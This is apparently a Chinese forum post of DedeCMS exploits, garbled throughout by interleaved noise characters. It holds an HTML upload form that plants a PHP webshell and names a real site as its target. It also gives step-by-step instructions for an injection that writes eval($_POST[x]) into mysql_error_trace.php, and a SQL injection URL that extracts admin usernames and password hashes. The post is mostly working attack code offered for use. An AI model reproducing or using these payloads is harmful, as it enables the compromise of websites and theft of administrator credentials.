+ e% V) m3 v" K4 H0 k: x<html>
0 R6 R) Q- T4 x Y! r<head>
5 R8 P, A2 c0 d4 j; F<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
6 P3 o7 O' q+ T5 X! o</head>
& A2 _. N6 W4 ^<body style="FONT-SIZE: 9pt">
4 K% T6 R8 e B' v. |---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />: a2 E K1 h( H0 _5 q5 |
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'># i0 b- Z* |6 o" ?9 O+ y
<input type='hidden' name='activepath' value='/data/cache/' />
' }+ l% _# U/ B+ o5 N, R# s6 @<input type='hidden' name='cfg_basedir' value='../../' />
# A+ K6 o- Q! B+ [2 }& G<input type='hidden' name='cfg_imgtype' value='php' />6 g; c4 Q" V l$ }
<input type='hidden' name='cfg_not_allowall' value='txt' />
- L, X3 p9 O K' P6 X! e* R<input type='hidden' name='cfg_softtype' value='php' />
$ a7 Z; q- K# R, B. l( i2 [% o1 U<input type='hidden' name='cfg_mediatype' value='php' />$ H) _+ ?6 s, J2 q# t8 f3 Z
<input type='hidden' name='f' value='form1.enclosure' />2 {1 J% h m2 C- W8 ]0 X' S, p
<input type='hidden' name='job' value='upload' />
) ?7 d6 @" \5 O<input type='hidden' name='newname' value='fly.php' />
; ~. g3 _7 u" A7 c4 J, O8 m+ M: `Select U Shell <input type='file' name='uploadfile' size='25' />
. u2 j5 |0 X% D7 H ^- A<input type='submit' name='sb1' value='确定' />$ t% o0 ?! S& ]$ y7 ~7 e+ R
</form>
7 }( m; @& ^+ V7 l+ ?# @9 R<br />It's just a exp for the bug of Dedecms V55...<br />
5 S; ]* L9 c& P8 S( [' g& H* ONeed register_globals = on...<br />
% F2 Q" E, H h% @Fun the game,get a webshell at /data/cache/fly.php...<br />! `" c4 X/ J2 X Y% ^
</body># E D" l2 x3 j
</html>4 ^" A7 V! ^ M8 g$ r
+ F9 x& K% G- ?9 Z( M
* R" j* @* B" R `* R
/ N+ E* S7 p: n) v/ E- M' p" w! G7 O
_6 H7 h1 a3 x& t" y& F
) V+ o2 L* b* p) ^% E7 N
( s+ r4 U! D+ K p. o4 ~8 G6 c
) }8 J* b4 c% L1 k
& m; s1 {' y) X+ k' s1 A# p
' `! E/ I% k5 E, i6 m织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
0 Q: |7 O; R; j* P利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。2 j) k1 k# l0 M
1. 访问网址:
' u% P, f; K# P* khttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
1 {8 \: K- `& x- S; I4 A可看见错误信息
2 ^! ]; X' `7 ^4 I3 {! o- t* F$ h
6 ^3 b/ d# Y" D" W& _$ O% p" X
/ P- q" T- z+ d1 |( f0 G! Q2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
* \+ b! @, V0 B- J" N2 Sint(3) Error: Illegal double '1024e1024' value found during parsing
& D! p7 V; ^# Q) HError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
+ I/ J( y2 p9 t! o+ s! g7 X% O( ?6 n+ U+ P
( \8 k# M- r% h, E! U2 F
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
! U1 D, V3 X O% B. x n: R B* |, h; X
! z8 r; H7 v A) W<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>( H6 o: O( a9 h. Z* K+ Z. \3 O$ X0 o
$ ~: o# ], \4 r8 P7 ] Z6 P
* z4 W3 m" ^' X& x按确定后的看到第2步骤的信息表示文件木马上传成功.3 s: {. G }" n3 s0 W
8 V z; ?0 n3 U, W+ r$ J; |
' L" E, Q: O3 w% ]' f, }- K! p4 ]3 L( j/ Z$ a f
" {! X/ `. a& i# k) v) ?& G0 @
/ t9 ?: B8 Y: O1 o$ j8 v
( _" H, M9 |( {6 }4 B3 U
1 c3 z4 w0 M! O% t* Z% c3 ?- ^/ r& [
+ t% P" j. e0 J* r$ G$ R( S+ W1 g B1 C2 @7 P
$ Q. {( }4 e' z G2 _8 C6 u# a$ E* _% {7 { m1 @% M) R- U" t$ D
- `- w) [7 N/ q5 P& c织梦(DedeCms)plus/infosearch.php 文件注入漏洞+ K0 y4 S+ V, R4 e- w4 E2 @% F) I( t* @
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对